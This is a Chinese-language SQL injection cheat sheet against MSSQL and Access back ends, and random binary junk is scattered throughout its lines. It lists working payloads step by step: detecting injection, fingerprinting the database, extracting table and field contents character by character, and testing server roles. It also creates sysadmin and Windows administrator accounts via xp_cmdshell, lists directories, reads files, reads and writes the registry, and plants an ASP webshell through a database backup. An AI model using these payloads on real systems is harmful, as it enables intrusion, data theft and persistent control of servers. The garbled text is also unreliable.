1.判断是否有注入;and 1=1 ;and 1=2 .N8AkQ�(Ok
2.初步判断是否是mssql ;and user>0 m�H�o}, |�
�(bi}?V*�
3.注入参数是字符'and [查询条件] and ''=' F_�=RY��]�
G}C�ze�L�w
4.搜索时没过滤参数的'and [查询条件] and '%25'=' _��*1�/4�^
l;:
L0�(('
5.判断数据库系统 �etj8M
y6=
U7.3�`qd"�
;and (select count(*) from sysobjects)>0 mssql ��!CR�Oc}�
�[y|�"iS�D
;and (select count(*) from msysobjects)>0 access |j��V����>
�0&�Q-y&$7
L5E.`^��?
_h�!�OGLec
6.猜数据库 ;and (select Count(*) from [数据库名])>0 b�E.,)�GY
u~�\u��8X3
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 j^T�.7Zv��
jpZ��, ��$
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ~`c?&�YixU
Ln0rm9FV-�
9.(1)猜字段的ascii值(access) |ul2�5/B
B
);�V6���YE
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 {,��tEe'H7
*SQ h�X�Tn
(2)猜字段的ascii值(mssql) Cfu�]umZLn
/�=A?O\B7
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Q�x|m{1~-�
C3Q[L}X�\
10.测试权限结构(mssql) `m��e2���Q
�r k�;k:<c
^AK<]r<?L?
zE5%l`@|o�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 9(�D�S"fgC
$-m@cObw!.
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- \]�;0S4SBy
V #W,}+_Sz
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- _eM\ /(v[
��z�9pv��|
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �b��l��N�J
)�#z�c$D^U
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �cS�/\&%7u
x2�/\%�!mt
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ��a}�ogNx�
&�U ]L@�]x
;and 1=(select IS_MEMBER('db_owner'));-- �xt�YX}u�
fE�E[�h�uG
DcA�{E8Y�
��*,X;4?:,
11.添加mssql和系统的帐户 jIwz
G+)$P
0P^�RciC f
;exec master.dbo.sp_addlogin username;-- (:��Rj:8{�
;exec master.dbo.sp_password null,username,password;-- AJt�*48H*G
:@{(�^}N8u
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- J�sI`����#
m�07=
_��4
;exec master.dbo.xp_cmdshell 'net user username password �yKF"\�^`@
Yo3my>N&�g
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Cq�y84!Z<�
C-lv=FJEk/
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Ahk6�{uz�
Y3+D�TR0|'
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- F|�3T�e�?_
�8R"c�}�87
hR�Tw8-wy:
nI�.K|hU:P
12.(1)遍历目录 -/r�P0h�5#
S0\QZ/je��
;create table dirs(paths varchar(100), id int) 42E]&=�Cet
~kP�Hf_B;z
;insert dirs exec master.dbo.xp_dirtree 'c:\' L��g�Xc}3�
[E<NE��l�*
;and (select top 1 paths from dirs)>0 �z ^t6VF�M
$Y* d ' >�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) TE�L�N�4�*
=i[�_C>��U
/ r6^]grg
dPZ�r�X{ c
(2)遍历目录 �=vJ:R[Ilw
? �cU9�~=�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �5<�ZE.'�O
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ci*�r�em�
=p��~k5k�4
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 j�e�z��=q�
O�Q>8Q��`�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 j<|I����@0
�K�",YAfJa
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 OZ>�w.$ue
�1��;8=,&�
Aiyx!Q6v�T
�%�;S�T�7�
13.mssql中的存储过程 ����*|W�S,
?5�'E��P|<
xp_regenumvalues 注册表根键, 子键 0?c2=�Y��
<&JK5$l<X
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 &w1�5�GO;4
KA~e�OEj�M
xp_regread 根键,子键,键值名 ��oA/[�>\y
2tPW1"�M.n
;exec xp_regread i/U�Dda"�E
2kukQj�(�n
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 K�9-;-�{qb
DzZ�En]+zt
xp_regwrite 根键,子键, 值名, 值类型, 值 |q|�?y`X4/
Vx'82C��IC
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��ct��g� U
|w; hu��]
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 rgq~lZ.U4K
T0���H�Nld
xp_regdeletevalue 根键,子键,值名 �H�(|n,��c
���SXq�Wq�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 aMv?D(Me�b
�~l {�*X�M
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 T'i^yd�}*v
'%Fg+cZN\
{�"�v�~1W)
h�2S�!�<�
14.mssql的backup创建webshell ,gO}H)v]�t
r�go#�mTQ_
use model ��E5�;6ks)
\_v�jc]?��
create table cmd(str image); IvZ,�|�R?�
q\DN8��IJ�
insert into cmd(str) values (''); 1>yh`B�p\=
�8'sT zB]�
backup database model to disk='c:\l.asp'; �,|}}�Ml��
��^uiQ�Z%;
�{{�:Q�tkN
lwSZ�p�S��
15.mssql内置函数 6
4��,('+�
EjA3�h�HJ�
;and (select @@version)>0 获得Windows的版本号 APgjT'�;P^
02�����$d
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �ayGc���c`
/nq\�*)S#&
;and (select user_name())>0 爆当前系统的连接用户 �WWEZTFL:j
�!-veL�1�r
;and (select db_name())>0 得到当前连接的数据库 .I��U\�wN�
Iwx~kvz\_(
w!�%"b0�3q
?W� 6
�:$
16.简洁的webshell (-�D^_*f��
|LLD�aA-=0
use model Te6cw+���6
�h}y]��Pt?
create table cmd(str image); �~�dB���x<
�h�`n)�
�b
insert into cmd(str) values (''); 5i@����WBa
!AXt6z �cZ
backup database model to disk='g:\wwwtest\l.asp';
